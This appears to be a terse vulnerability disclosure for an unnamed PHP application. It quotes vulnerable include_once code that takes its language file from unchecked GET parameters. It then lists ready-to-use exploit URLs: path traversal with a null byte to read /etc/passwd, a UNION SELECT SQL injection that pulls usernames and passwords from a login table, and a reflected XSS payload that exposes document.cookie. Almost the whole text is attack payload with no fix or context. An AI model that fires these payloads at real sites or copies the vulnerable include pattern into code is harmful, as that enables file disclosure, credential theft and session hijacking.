if(isset($_GET['lang'])) $include_lang = $_GET['lang']; } elseif(file_exists(TOP_DIR.'/sql/db_connect.php')) { include_once(TOP_DIR.'/functions/db_api.php'); $include_lang = get_language(); } else { $include_lang = get_http_accept_lang(); } include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
http://path/docs/index.php?lang=/../../../../../../../../../../test
http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
switch($_GET['whatlang']) { case 1: include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php'); break; default: include_once(TOP_DIR.'/lang/lang.English.php'); break; }
http://path/install.php?whatlang=1&language=/../../../../../../../test
http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00
http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*
http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E